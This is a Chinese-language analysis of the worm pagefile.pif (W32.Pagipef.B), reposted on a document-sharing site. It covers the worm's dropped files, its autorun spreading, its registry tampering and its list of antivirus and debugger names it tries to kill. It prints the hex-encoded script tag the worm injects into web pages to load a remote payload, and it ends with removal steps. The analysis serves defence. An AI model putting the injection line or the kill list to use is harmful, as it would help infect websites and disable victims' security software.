pagefile.pif(w32.pagipef.b)

《pagefile.pif(w32.pagipef.b)》由会员上传分享，免费在线阅读，更多相关内容在学术论文-天天文库。

1、pagefile.pif(W32.Pagipef.B)～教育资源库　　昨天在别人电脑上抓的````一个pagefile.pif````　　不记得自己写过没有``不过以前遇到过几次``好像是更新的版本``过7日的卡吧、瑞星、BD等``　　这次更新的版本比较恶劣，怀疑是熊猫原码泄露````:(　　　　AditionalInformation　　Filesize:69632bytes　　MD5:86ae07b7f81a35f268d11fe39a090a50　　SHA1:a09329ed3d8b729372f01819b30c3004011e04ee　　CRC32　　:84E8

2、D7FA　　RIPEMD160:1C8C3977C66AF86DBC31D38BBD7A0CB4F10096B9　　SHA160　　:A09329ED3D8B729372F01819B30C3004011E04EE　　packers:BINARYRES,FSG　　Languages:MicrosoftVisualC++6.0　　运行，释放：　　%Systemroot%system32lsass.exe　69632字节　(RHSA)　　%Systemroot%system32smss.exe　9261字节　　每个分区（CF）下的Autorun.inf和pagefile.pi

3、f　　貌似不支持U盘传播=.=`（至少没跟踪到）　　修改注册表：　　（用了另类方法破坏显示隐藏文件功能）　　HKEY_CURRENT_USERSoftss.exe（路径为%Systemroot%system32）``　　使用双进程守护技术```　　监视对方的存在和自身同党、注册表项等``如被修改或删除，则重写````　　并尝试关闭下列关键字：　　process　　安全卫士　　　　asm　　ida　　进程　　　　卡巴　　　　瑞星　　　　毒霸　　　　杀毒　　　　江民　　　　softice　　virus　　　symantec　　　　avp　　regedit　　kaka　　汗``

4、连反汇编工具都不放过`````！　　后遍历磁盘，查找扩展名为jspphpspxasptmlhtm的，插入一段代码：　　<scriptsrc=h**p://%78%77%2E%6D%6F%76%37%38%2E%63%6F%6D/%62%32%2E%61%73%70></script>　　解密后得：　　h**p://xov78.b2.asp　　由于时间关闭，并未光临该网站，我猜一定有很多好玩的东西````　　最后还感染了除系统盘和ss.exe　　C:AUTORUN.INF　　C:pagefile.pif　　D:AUTORUN.INF　　D:pagef

5、ile.pif　　E:AUTORUN.INF　　E:pagefile.pif　　F:AUTORUN.INF　　F:pagefile.pif　　打开注册表，把上面提到的键值改回来```ShowSuperHidden和Type值```　　然后升级杀软，全盘扫``修复被感染的EXE文件```（捆绑方式的，修复成功率应该很高吧？。。。）　　PP：12下一页友情提醒：，特别！上一页12友情提醒：，特别！